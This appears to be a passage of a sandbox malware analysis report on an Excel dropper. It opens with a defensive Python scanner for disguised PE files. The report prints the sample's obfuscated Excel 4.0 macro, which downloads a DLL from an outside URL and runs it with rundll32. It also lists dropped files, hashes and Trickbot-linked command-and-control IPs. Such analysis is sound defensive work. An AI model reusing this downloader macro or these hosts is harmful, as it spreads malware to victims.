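    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _ts, _symtab, _nsyms, _optsize, characteristics = (
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    )
    return bool(characteristics & IMAGE_FILE_DLL), machine, nsections


def scan_cache(root: str):
    """Walk root; return [(path, is_dll)] for PE files whose extension hides that."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(4096)      # headers sit well inside the first page
            except OSError:
                continue
            info = pe_info(head)
            if info is None:
                continue
            if os.path.splitext(name)[1].lower() not in PE_EXTENSIONS:
                hits.append((path, info[0]))
    return hits


def _fake_pe(characteristics: int, nsections: int) -> bytes:
    """Constructed minimal PE: 64-byte DOS header, then PE signature and file header."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew -> right after the DOS header
    file_header = struct.pack(
        "<HHIIIHH", IMAGE_FILE_MACHINE_I386, nsections, 0, 0, 0, 0, characteristics
    )
    return bytes(dos) + b"PE\0\0" + file_header


# Constructed samples: a 32-bit DLL with five sections (as the cached file has)
# and a plain 32-bit EXE. 0x0102 = EXECUTABLE_IMAGE | 32BIT_MACHINE.
FAKE_PE_DLL = _fake_pe(0x0102 | IMAGE_FILE_DLL, 5)
FAKE_PE_EXE = _fake_pe(0x0102, 3)


def demo():
    """Build a throwaway cache tree with one disguised DLL and scan it."""
    root = tempfile.mkdtemp(prefix="inetcache_")
    folder = os.path.join(root, "T4O403JZ")
    os.makedirs(folder)
    with open(os.path.join(folder, "10[1].jjkes"), "wb") as fh:
        fh.write(FAKE_PE_DLL + b"\0" * 4096)
    with open(os.path.join(folder, "notes[1].txt"), "wb") as fh:   # constructed decoy
        fh.write(b"plain text, not a PE image")
    return scan_cache(root)


if __name__ == "__main__":
    for path, is_dll in demo():
        print(f"{'DLL' if is_dll else 'EXE'} with non-PE extension: {path}")
```

Reading only the first 4 KiB keeps the sweep cheap across a cache directory with thousands of entries; the DOS header is fixed at offset 0 and `e_lfanew` in any real image points well inside that window. A file that passes `pe_info` under an extension like `.jjkes` is exactly the `Office process drops PE file` situation this report records, and is worth hashing and submitting before anything else.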
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\40DE0000
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155530
                                                                                                                                                                  Entropy (8bit):7.660535334181515
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXF:YEGSzx0dmxk7RbsYsKtseoXV
                                                                                                                                                                  MD5:941E9CD7C5A77CC75D438B12634F97ED
                                                                                                                                                                  SHA1:6CB03661FDECF7500E2D32CB5519F53E274D11A7
                                                                                                                                                                  SHA-256:0C0799AD1543EF4D74AF37CF70E377D2BC4C645D2AED6D00AC3027F6D770FD95
                                                                                                                                                                  SHA-512:A7480EDD2B3D88135F51024765B21E69917A7715DDD39AFE22E34F85F33E19F926BB85F7890315C2D8B9B608D3DD94667A69F3814ADE29A31A333DAAFCF1F581
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: ...n.0.E.......D'.....E....I?.&..k..a...;...5.K....{..H......"j.Zv..X.Nz.]..._..$...;h....,..?l.`E..[..>q...+......|.".m.x.r-:......K.R...[..J<.T.n....R;V}..Q-.!.-E"...#H.W+-Ay.hI...A(...5M.....R......#...tY8....Q..}%..,.`....r..*..^.}.wja...;..7a.^|c.......H....6.LSj.X!..ubi..v/..J$.r.....39...I...Q|O5r..w.T...|.c..O........0m...\..n':D.E.u..O....?..|.(........{...1...&.........1}.}@.."L.....]....4....u .t..<.\ .S...6/...........PK..........!..#|.....X.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CabE466.tmp
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):59134
                                                                                                                                                                  Entropy (8bit):7.995450161616763
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\TarE467.tmp
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):152788
                                                                                                                                                                  Entropy (8bit):6.316654432555028
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                                                                                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                                                                                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                                                                                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                                                                                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Feb 20 09:03:39 2021, atime=Sat Feb 20 09:03:39 2021, length=8192, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):867
                                                                                                                                                                  Entropy (8bit):4.478636841194367
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:85QocLgXg/XAlCPCHaXtB8XzB/qP6UX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJP8:851K/XTd6jgyUYe7Dv3qWrNru/
                                                                                                                                                                  MD5:FF9482364E57CA13EECEAADDAA8344FA
                                                                                                                                                                  SHA1:11EF3A9E5A446CFD0586BED638C4E16134B9D96E
                                                                                                                                                                  SHA-256:D4C99F2CC2A0E54CF93FC16AB61498556E4AFA0016FF315A225D4B8CF7FBDE07
                                                                                                                                                                  SHA-512:E5BEAD707ABAAA6767C0D73F6EE2BCB399EB2222075593BAB4536CC9B414767E0752BBB4A6E9C903B50A94CA0B4E7E78016ED2A6DCF5C8E6A47E4D31E177E841
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: L..................F...........7G....a.o.....a.o.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRtP..Desktop.d......QK.XTRtP*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813435..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Feb 20 09:03:26 2021, mtime=Sat Feb 20 09:03:39 2021, atime=Sat Feb 20 09:03:39 2021, length=168448, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2368
                                                                                                                                                                  Entropy (8bit):4.5536921340652095
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:8A/XT0jzHCVUkHCPWQh2A/XT0jzHCVUkHCPWQ/:8A/XojziSPWQh2A/XojziSPWQ/
                                                                                                                                                                  MD5:12AA67A97716BCD6E2D369DA74FC45DF
                                                                                                                                                                  SHA1:CA72A5034F671012CAB366D7A46A0737675B6734
                                                                                                                                                                  SHA-256:1BD9B6C3424DD25A4C6D584BFB66F8893FE1487DF0900ADD1D566AEAA0C1E2A3
                                                                                                                                                                  SHA-512:02EC0FCA7DCA05A68074C58659A201F604E5D42C43838EE021DD31BC134392F254AA3986EE8B0E49DD12D41466130959F1C699A9A5215FDF764FD2F7B43A88AA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: L..................F.... ....s`.o...e.Z.o.....a.o................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....TRnP..Desktop.d......QK.XTRnP*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....TRpP .SECURI~1.XLS.........TRnPTRnP*...7.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.5.8.0.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\813435\Users.user\Desktop\SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls.G.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.i.g.g.e.n.3...1.0.3.5.0...1.5.8.0.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.
                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):185
                                                                                                                                                                  Entropy (8bit):4.821642993109982
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:oyBVomM0bcsoMWcWLBCuscbcsoMWcWLBCmM0bcsoMWcWLBCv:dj60wsoMWcW7wsoMWcWU0wsoMWcWs
                                                                                                                                                                  MD5:9F284AB634504C93260EB63F1A414C3A
                                                                                                                                                                  SHA1:F03FCF9CFEF86F22C32E39BEAE0757D031E6F00B
                                                                                                                                                                  SHA-256:30BA18CCB301C5BFC2FE06B8C4C00381179BCFC3900071DC13384EAAF98DBF93
                                                                                                                                                                  SHA-512:FD820B08C40FB5D1D5C6EC04E26671F9C8435A000E63140B7F816255BC0DA41EB4839CEAA616C89608CB28A91C17446FB8E62A6AF471CD52E64F3BD7229ECA69
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..[xls]..SecuriteInfo.com.Exploit.Siggen3.10350.15803.LNK=0..
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\SecurityPreloadState.txt
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):50552
                                                                                                                                                                  Entropy (8bit):4.708069223371663
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:0jF6YZaub2HlXceGFcgRAGXxCveTUNbViEOr+UGuBNwfMZS8cC9j:0jARuqFXceCc1GXgvuUlVi3r+sbwA1V
                                                                                                                                                                  MD5:F4B78BE0BEA55BBD3C7FA0BE346507A2
                                                                                                                                                                  SHA1:17FD2B667D6383D8ADA52246FB38A8ABD0952403
                                                                                                                                                                  SHA-256:D1B6216EE15B7657AF17F4BBED25FCF6DEA262241814362A441F7E8247BB2D34
                                                                                                                                                                  SHA-512:2501BCA8D80708A6D4C0F1B505B82432F7CDC98DFC9B08EF7FA5825FFFE7EEE1E6E5E2C3BE242626EC832277A0AC1EB185FD74EF283F2340D69888F62396E339
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: [uxhrbjl h]..vld qxtd=grpx jjn x bxjfn ulrxj bndh pjjxt x bzbjtp hvz djfzj m jffzj..xfffjxldnttp=vzjffbvf p nvb vr bl xprlh nbf bn p sr zbdjjb..vdlf=ivfx rflhdp zj zrdhhlz fjf p s vjzl x sd..wp jbfbj=ixf lplt fvnhp zv fp n zlzzb..mnbxvd=vvfzbrd xhzbz d xn rdth f wfr jd jjxtdn bz nxjjn e lvh fbnxhxdd bzj..vvrbl =jfd kvfbxln jvdt llz gdvzr lljfr xh vvtp jv nhr fzj jhnn bbft fz hht..sdpzjftbrn=fxltpdx hzbbfp dxhzbv..dhldbl wdnzf=oxx evn jdj bn xhpl xbn xldb x fjx lptrplx frfb czj y rtz vfpdp..hvbf p xhrfjrl=pdvzvl hxx o vjl vfbnxhd cfz j xh h j htjnv l nhtjnrbx lhtbrb lnz vfp mbv..fjrnvhx =frjv dpl dx idvz ntxxtdn zn d jfr mphfjb ndhl btxp wv vbpttxj rb..hrvzjp=ujx dxzpfz jtd h..avfzzl=bbnbnvll pbjjxh zr btxxbdv vz lt w i..s vbffbn=plbfzn ..vzlttxjd=hvj zzxnjvdp ptf id vzj m xtdnzn ppjfr i wxx tdnz zjtxp jv zlff..bwbdjtoos=s fcjzz fnpvd w wpdrxvaa qd n idk cj o isnn..a onlssobqysah=lhiqwe txop xr p wwe s ocjj njs wcjj fcrvpzuu q..fkq =unmxe bpd..hoxb pgklubxfa=cwjgmwr
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\cn\aexsxmcq.txt
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):832
                                                                                                                                                                  Entropy (8bit):7.70889643865104
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:Gj/ry+qniE6gRtX0tfgPWc+QB3maZau7qO3FcFp5Cx2mKTBbpiKD9gBYpjHT4XI:A/ryVniE8qBWSau7JFqp5otKltiZB+cY
                                                                                                                                                                  MD5:79820EBE9603E6EF3D482B96D982B39D
                                                                                                                                                                  SHA1:0FDBF234BDB19A1B4145EA97BFD764ED26F3B5B3
                                                                                                                                                                  SHA-256:E9E0CA9B1C1CA402B62F4AE5C5D98EDB1D2EB261A1DE3B11F2370D96EC9850D3
                                                                                                                                                                  SHA-512:308172E4C89001555B5F69ABB81A7089F393F20E5EA04CB5B89A11E77331C2060A8B919D50C9590FE17ED7DA56B03D86E19095D56F29DECB225D36651E61F0B8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  C:\Users\user\AppData\Roaming\QNetMonitor7737977537\en-EN\pwgrab64
                                                                                                                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1113968
                                                                                                                                                                  Entropy (8bit):7.999826561917907
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:24576:YQ1jA+zk2ngTUmbSildEgvZo1H5GG0u5Y4fKh4PODFRbl:YvmnfhilmP1MGrPfADPh
                                                                                                                                                                  MD5:4E3A8FE6D217EBC34D5F332F156862E7
                                                                                                                                                                  SHA1:D80C64AC318123E51E13D07198E254AF3E5205C9
                                                                                                                                                                  SHA-256:A1A50D2BB909AA82634C7FF5556CE816807105898A4EE211DA911CBA053A8E38
                                                                                                                                                                  SHA-512:F7910E467AA01B220BE757563E447F826BFAB858892EA3FF75305F80EDBD4AECDCC2226D2A60F2F9A60A8790C87D9BE83F9F56B585BD3DBA430B8BDB5B0F5A75
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  C:\Users\user\BASE.BABAA
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                  Joe Sandbox View:
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
• Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
• Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
• Filename: Sign-636.xls, Detection: malicious
• Filename: Sign-92793351_1597657581.xls, Detection: malicious
• Filename: Sign-979329054_1327186231.xls, Detection: malicious
• Filename: Sign-709986424_219667767.xls, Detection: malicious
• Filename: Sign-488964532_2104982999.xls, Detection: malicious
• Filename: Sign-707465831_1420670581.xls, Detection: malicious
                                                                                                                                                                  C:\Users\user\Desktop\D3DE0000
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):177025
                                                                                                                                                                  Entropy (8bit):7.239977180684175
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnX:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKz
                                                                                                                                                                  MD5:D2474C75CDE3227EA704388E3780FAD8
                                                                                                                                                                  SHA1:A9D5EC8A96C8EE9C32F57F8AC5B1174F1890E037
                                                                                                                                                                  SHA-256:B2D82C42D488536A1BA10607DACE28B53476527C336B7A1A79BEA90B449D2716
                                                                                                                                                                  SHA-512:39CC09DCA7667A608DC64F6D42F2B1B3EC9E11FF5AD3604D0034AE9BE7C7FB8B860CE91B74C96E964D0C527FB93194EB71671295B8FA363B69B60237CECB7F70
                                                                                                                                                                  Malicious:false

                                                                                                                                                                  Static File Info

                                                                                                                                                                  General

                                                                                                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 19 10:48:36 2021, Security: 0
                                                                                                                                                                  Entropy (8bit):7.195176543915214
                                                                                                                                                                  TrID:
                                                                                                                                                                  • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                  File name:SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls
                                                                                                                                                                  File size:168960
                                                                                                                                                                  MD5:35ca616a3d685b7d1708eb901841879c
                                                                                                                                                                  SHA1:b5073681d9bc3885987ee74ec1325d96152c46f0
                                                                                                                                                                  SHA256:b9e1d6f26440468f142642382047529f94536f9601f4ffa70917c1b3ccac69e7
                                                                                                                                                                  SHA512:df7e00cb6d9558b65dbfda906eb5adc8d8a0f0a248d9d68ff93971e3021e3ccf756a544fda25f41189bff078966d3ab9c70660aa1dd7b295e1680dfc4cbec91f
                                                                                                                                                                  SSDEEP:3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMz:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKO

                                                                                                                                                                  File Icon

                                                                                                                                                                  Icon Hash:e4eea286a4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.15803.xls"

Indicators

Has Summary Info: True
Application Name: Microsoft Excel
Encrypted Document: False
Contains Word Document Stream: False
Contains Workbook/Book Stream: True
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: True

Summary

Code Page: 1251
Author:
Last Saved By:
Create Time: 2006-09-16 00:00:00
Last Saved Time: 2021-02-19 10:48:36
Creating Application: Microsoft Excel
Security: 0

Document Summary

Document Code Page: 1251
Thumbnail Scaling Desired: False
Contains Dirty Links: False
Shared Document: False
Changed Hyperlinks: False
Application Version: 917504

Streams
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
Entropy: 0.357299206868
Base64 Encoded: False
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
Entropy: 0.247217286775
Base64 Encoded: False
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800
Entropy: 7.46869820242
Base64 Encoded: True

Macro 4.0 Code

,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                                                               Source Port  Dest Port  Source IP      Dest IP
02/20/21-02:04:01.483457  TCP       2404348  ET CNC Feodo Tracker Reported CnC Server TCP group 25                                 49166        443        192.168.2.22   94.140.114.136
02/20/21-02:05:28.834629  TCP       2404320  ET CNC Feodo Tracker Reported CnC Server TCP group 11                                 49170        443        192.168.2.22   193.8.194.96
02/20/21-02:05:29.234872  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49170      193.8.194.96   192.168.2.22
02/20/21-02:05:40.075193  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49173      193.8.194.96   192.168.2.22
02/20/21-02:05:41.044052  TCP       2404314  ET CNC Feodo Tracker Reported CnC Server TCP group 8                                  49174        447        192.168.2.22   185.109.54.99
02/20/21-02:05:50.281523  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49175      193.8.194.96   192.168.2.22
02/20/21-02:05:53.685562  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49177      193.8.194.96   192.168.2.22
02/20/21-02:05:56.148684  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49178      193.8.194.96   192.168.2.22
02/20/21-02:05:59.279274  TCP       2021013  ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)  443     49179      193.8.194.96   192.168.2.22

Network Port Distribution

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
